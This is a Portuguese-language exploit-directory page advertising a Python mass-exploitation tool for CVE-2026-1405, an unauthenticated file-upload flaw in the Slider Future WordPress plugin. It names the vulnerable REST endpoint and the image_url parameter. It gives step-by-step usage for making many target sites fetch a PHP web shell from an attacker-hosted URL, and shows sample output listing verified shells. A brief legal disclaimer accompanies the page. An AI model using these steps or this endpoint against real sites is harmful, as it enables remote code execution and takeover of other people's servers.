Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-1405 — Slider Future <= 1.0.5 - Upload Arbitrário de Arquivos Não Autenticado | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2026-1405
Geração de PayloadsExploraçãoScripting e AutomaçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubnxploited/cve-2026-1405

CVE-2026-1405

Slider Future <= 1.0.5 - Upload Arbitrário de Arquivos Não Autenticado

Ver Repositório
411há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-1405

Slider Future <= 1.0.5 - Upload Arbitrário de Ficheiros Não Autenticado

🚀 CVE-2026-1405.py — Ferramenta de Exploração em Massa do Slider Future

🩸 Visão Geral da Vulnerabilidade

Componente: Slider Future (plugin WordPress)
Versões Afetadas: ≤ 1.0.5
Vulnerabilidade: Upload Arbitrário de Ficheiros Não Autenticado
CVE: CVE-2026-1405
Pontuação CVSS: 9.8 (Crítica)

O plugin Slider Future para WordPress é vulnerável a uploads arbitrários de ficheiros devido à falta de validação do tipo de ficheiro na função slider_future_handle_image_upload em todas as versões até e incluindo a 1.0.5. Isto permite que atacantes não autenticados carreguem qualquer tipo de ficheiro—incluindo shells PHP maliciosos—diretamente no servidor afetado, possibilitando a execução remota de código.


⚡ Funcionalidades do Exploit

  • Exploração em massa em vários alvos.
  • Utiliza o endpoint vulnerável: /wp-json/slider-future/v1/upload-image/
  • Faz upload de um shell PHP remoto através do parâmetro image_url (sem necessidade de autenticação).
  • Verifica automaticamente a execução do shell verificando assinaturas definidas pelo utilizador.

  • 🛠️ Instruções de Utilização

    1. Prepare um ficheiro de texto com os sites WordPress alvo (um por linha):

    root@kitploit:~
    http://example1.com
    https://example2.com
    ...
    

    2. Aloje o seu shell PHP online e tenha o seu URL direto pronto.

    Exemplo: http://yourserver.com/shell.php

    3. Execute o script:

    root@kitploit:~
    python3 CVE-2026-1405.py
    

    Será solicitado:

    • Ficheiro de alvos: Caminho para a sua lista de alvos (padrão: list.txt)
    • URL direto do shell: O shell online e acessível que pretende carregar nos alvos
    • Assinatura do shell: Uma string única no seu shell para verificação (ex.: Nxploited)
    • Threads: Número de threads paralelas (padrão: 10)

    4. Resultado

    • Os resultados do exploit são exibidos em tempo real numa interface profissional baseada em Rich.
    • Os alvos bem-sucedidos e URLs de shell são automaticamente guardados em success_results.txt.

    📝 Detalhes do Script

    • Nome: CVE-2026-1405.py
    • Autor: Nxploited
    • Linguagem: Python 3
    • Bibliotecas: requests, rich

    Como Funciona

    1. Envia um pedido POST para o endpoint vulnerável de cada alvo:
      • URL: /wp-json/slider-future/v1/upload-image/
      • Parâmetro: image_url apontando para o seu shell.
    2. Analisa a resposta JSON para extrair o URL do shell carregado.
    3. Visita o URL do shell e procura pela sua string de assinatura.
    4. Exibe o estado: sucesso ou falha para cada alvo.

    ⚠️ Aviso Legal

    Esta ferramenta destina-se apenas a fins educacionais e de teste de segurança autorizados.
    O uso não autorizado contra sites que não possui ou para os quais não tem permissão explícita para testar é ilegal.


    💡 Exemplo de Resultado

    root@kitploit:~
    Exploit para: CVE-2026-1405
    Por: Nxploited
    
    Alvos carregados: 12
    URL do shell: http://yourserver.com/shell.php
    Assinatura: Nxploited
    
    2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCESSO | Shell Verificado: http://target1.com/wp-content/uploads/2026/02/shell.php
    2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Falha no upload ou URL do shell não encontrado.
    ...
    Concluído: 3/12 bem-sucedidos em 14.7s
    Sucessos guardados em success_results.txt
    
    Baixar ferramenta